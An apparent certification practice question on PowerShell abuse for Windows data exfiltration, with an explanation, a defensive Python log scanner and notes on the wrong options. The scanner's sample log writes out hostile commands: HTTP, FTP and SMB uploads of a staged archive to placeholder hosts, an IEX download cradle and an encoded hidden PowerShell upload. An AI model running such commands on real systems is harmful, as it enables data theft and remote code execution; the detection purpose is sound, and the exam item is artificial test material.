During a forensic investigation, you find that the attacker used a legitimate Windows tool to exfiltrate data. Which tool is commonly abused for this purpose?
PowerShell. It is native to Windows and is frequently abused for data exfiltration because it can script uploads over several protocols without any additional binary.
Why this answer
PowerShell is a legitimate Windows administrative tool that attackers commonly abuse for data exfiltration because it exposes network protocols directly from the command line: HTTP and HTTPS through Invoke-WebRequest and Invoke-RestMethod, FTP and HTTP through the .NET System.Net.WebClient class (UploadFile, UploadString), and SMB through Copy-Item to a UNC path. No extra binary has to be dropped on the host. Because it can execute code passed on the command line (including Base64 with -EncodedCommand) or downloaded straight into memory with a cradle such as IEX (New-Object Net.WebClient).DownloadString(...), the script never needs to touch disk, which defeats file-based detection and makes it a favored tool for post-exploitation data theft. The practical countermeasure, and the forensic source you should check first, is PowerShell script block logging (Event ID 4104) together with module logging and process creation auditing, which record the decoded script even when it ran only in memory.
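The forensic side of the paragraph above, as an added example that is not part of the original page: a small scanner that runs the exfiltration indicators just described (HTTP POST uploads, WebClient uploads, SMB copies to UNC paths, archive staging, download cradles and -EncodedCommand payloads) over PowerShell log text. The log entries are constructed for the example, the hostnames and addresses are placeholders, and the rule names and thresholds are the author's own choices, not any vendor's signatures.

```python
import base64
import re

# Indicator rules: (name, regex). Each is a rough signature for one of the
# PowerShell exfiltration techniques discussed in the text.
RULES = [
    ("http_upload", re.compile(
        r"(?i)\b(?:Invoke-WebRequest|Invoke-RestMethod|iwr|irm)\b.*?"
        r"-(?:Method\s+(?:POST|PUT)\b|InFile\b|Body\b)")),
    ("webclient_upload", re.compile(r"(?i)\.Upload(?:File|Data|String|Values)\s*\(")),
    ("smb_copy", re.compile(
        r"(?i)\b(?:Copy-Item|Move-Item|cp|copy|xcopy|robocopy)\b[^|;]*\\\\[\w.-]+\\")),
    ("staging_archive", re.compile(r"(?i)\bCompress-Archive\b")),
    ("download_cradle", re.compile(
        r"(?i)\b(?:IEX|Invoke-Expression)\b.*?Download(?:String|File|Data)")),
]
# -EncodedCommand (and its short forms) carries a Base64 UTF-16LE script.
ENCODED = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Constructed sample: an encoded upload command as it would appear in a
# process creation (4688) command line. Built at runtime so it is exact.
ENCODED_PAYLOAD = base64.b64encode(
    "Invoke-RestMethod -Uri https://files.example.invalid/up "
    "-Method POST -InFile C:\\Windows\\Temp\\d.zip".encode("utf-16-le")
).decode("ascii")

# Constructed sample log entries (record id, script block or command line).
# These are not real captures; addresses and hosts are placeholders.
SAMPLE_ENTRIES = [
    (1, "Get-ChildItem C:\\Users\\alice\\Documents -Recurse | Measure-Object"),
    (2, "Compress-Archive -Path C:\\Users\\alice\\Documents "
        "-DestinationPath C:\\Windows\\Temp\\d.zip"),
    (3, "Invoke-WebRequest -Uri https://files.example.invalid/up "
        "-Method POST -InFile C:\\Windows\\Temp\\d.zip"),
    (4, "(New-Object System.Net.WebClient).UploadFile("
        "'ftp://198.51.100.7/incoming/d.zip', 'C:\\Windows\\Temp\\d.zip')"),
    (5, "Copy-Item C:\\Windows\\Temp\\d.zip -Destination \\\\198.51.100.7\\share\\d.zip"),
    (6, "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"),
    (7, "Get-Service | Where-Object Status -eq 'Running'"),
    (8, f"powershell.exe -NoP -W Hidden -enc {ENCODED_PAYLOAD}"),
]


def decode_encoded_command(text):
    """Return the decoded script from an -EncodedCommand payload, or None."""
    m = ENCODED.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_text(text):
    """Return the names of all rules that fire on one log entry.

    Encoded commands are decoded and rescanned so that indicators hidden
    inside the Base64 payload are still reported.
    """
    hits = [name for name, rx in RULES if rx.search(text)]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.append("encoded_command")
        hits.extend(h for h in scan_text(decoded) if h not in hits)
    return hits


def scan_log(entries):
    """Return [(record_id, [rule names])] for entries with at least one hit."""
    findings = []
    for record_id, text in entries:
        hits = scan_text(text)
        if hits:
            findings.append((record_id, hits))
    return findings


if __name__ == "__main__":
    for record_id, hits in scan_log(SAMPLE_ENTRIES):
        print(f"record {record_id}: {', '.join(hits)}")
```

Run against real data, feed it the ScriptBlockText field of Event ID 4104 records and the CommandLine field of 4688 records; note that the regexes are indicators for triage, not proof, and that a real investigation should correlate each hit with network connection and file access evidence.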
Exam trap
The trap here is that candidates often associate Netcat (a classic hacking tool) with data exfiltration, but the question specifically requires a 'legitimate Windows tool,' and PowerShell is the correct answer because it is built-in and widely abused, whereas Netcat is not native to Windows.
How to eliminate wrong answers
Option A is wrong because Telnet is an unencrypted remote terminal protocol (RFC 854) with no file transfer capability of its own; data can be pushed through a Telnet session by hand, but the client is an optional Windows feature that is not installed by default, sends everything in cleartext, and offers almost no scripting, so it is not commonly abused for automated or stealthy exfiltration. Option B is wrong because Netcat is a third-party network utility that is certainly used for exfiltration, but the question asks for a legitimate Windows tool, and Netcat is not included in Windows by default; it has to be brought onto the host, which is exactly what a living-off-the-land attacker avoids. Option D is wrong because FTP is a transfer protocol rather than a tool, and the built-in Windows client (ftp.exe) is a legacy cleartext client that speaks only plain FTP (no FTPS) and can be automated only through a command file (ftp -s:file); it does see real-world abuse, so do not rule it out during an investigation, but PowerShell is the far more flexible and more commonly abused choice and is present on every modern Windows system.